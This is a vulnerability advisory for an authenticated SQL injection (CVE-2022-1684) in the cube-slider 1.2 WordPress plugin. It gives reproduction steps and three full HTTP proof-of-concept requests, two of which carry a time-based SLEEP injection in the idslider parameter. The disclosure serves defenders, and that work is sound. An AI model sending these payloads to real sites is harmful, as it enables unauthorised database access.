cube-slider 1.2 WordPress plugin SQL injection
Vulnerability Metadata
Key | Value |
---|---|
Date of Disclosure | May 09 2022 |
Affected Software | cube-slider |
Affected Software Type | WordPress plugin |
Version | 1.2 |
Weakness | SQL Injection |
CWE ID | CWE-89 |
CVE ID | CVE-2022-1684 |
CVSS 3.x Base Score | 2.7 |
CVSS 2.0 Base Score | 4.0 |
Reporter | Daniel Krohmer, Shi Chen |
Reporter Contact | daniel.krohmer@iese.fraunhofer.de |
Link to Affected Software | https://wordpress.org/plugins/cube-slider |
Link to Vulnerability DB | https://nvd.nist.gov/vuln/detail/CVE-2022-1684 |
Vulnerability Description
The idslider
data parameter in cube-slider 1.2 is vulnerable to SQL injection in three different code sections. An authenticated attacker may abuse the edit
, delete
or save
functionalities of the plugin to craft a malicious POST request.
Exploitation Guide
Exploit 1: Edit
Login as admin
user. This attack requires at least admin
privileges.
Go to Settings
ant select Cube Slider
in the sub menu.
Add a new cube slider by clicking on New Cube Slider
.
Scroll down and use the Click to edit slider x details
button.
Clicking the previous button triggers the vulnerable request. idslider
is the vulnerable data parameter.
A POC may look like the following request:
In the code, the vulnerability is triggered by unsanitized user input of idslider
at line 207 in ./init.php
Exploit 2: Delete
Login as admin
user. This attack requires at least admin
privileges.
Go to Settings
ant select Cube Slider
in the sub menu.
Delete an arbitrary, existing slider by clicking on Click to delete slider x
.
Clicking the previous button triggers the vulnerable request. idslider
is the vulnerable data parameter.
(Note: The numeric ID value can be set arbitrarily)
A POC may look like the following request:
In the code, the vulnerability is triggered by unsanitized user input of idslider
at line 210 in ./init.php
.
Exploit 3: Save
Login as admin
user. This attack requires at least admin
privileges.
Go to Settings
ant select Cube Slider
in the sub menu.
Add a new cube slider by clicking on New Cube Slider
.
Scroll down and use the Save changes
button. No further data input is needed before clicking this button.
Clicking the previous button triggers the vulnerable request. idslider
is the vulnerable data parameter.
A POC may look like the following request:
In the code, the vulnerability is triggered by unsanitized user input of idslider
at line 199 in ./init.php
. Notice that there is no sanitization at all in the whole query!
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work. The SQL injection can be triggered by sending the requests below.
Exploit Payload 1: Edit
POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C9362415c79f3c67e8d1d87aa2c44ffaaf82b64262878824bbe4617c277a00b55; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C73a1ec3e227fd14f99e01a1ad8f86dccaa2ca668c00526f25564e4744e644ab0; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651515188
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
idslider=4+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&edit=Click+to+edit+slider+4+details
Exploit Payload 2: Delete
POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C9362415c79f3c67e8d1d87aa2c44ffaaf82b64262878824bbe4617c277a00b55; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C73a1ec3e227fd14f99e01a1ad8f86dccaa2ca668c00526f25564e4744e644ab0; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651515188
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
idslider=4+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&delete=Click+to+delete+slider+4
Exploit Payload 3: Save
POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 394
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651690550%7CIzsJvLe5qAzDH1qctKYKvf3fOqLu1Dshnphbt1aOLX5%7C8968917a5337f07f5db390194b15adfae8e850d20bc1c476fb1224002a9d5ca4; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651690550%7CIzsJvLe5qAzDH1qctKYKvf3fOqLu1Dshnphbt1aOLX5%7C5d10d0aa6e661c1d443d69997bb114ab7ea5fe8071c573c62f098d0ece9efe01; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651517751
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
idslider=6&name=Name&about=About&title1=Title+1&description1=Description+1&title2=Title+2&description2=Description+2&title3=Title+3&description3=Description+3&title4=Title+4&description4=Description+4&icon1=fa-glass&color1=%2381d742&icon2=fa-glass&color2=%2381d742&icon3=fa-glass&color3=%2381d742&icon4=fa-glass&color4=%2381d742&submit=Save+Changes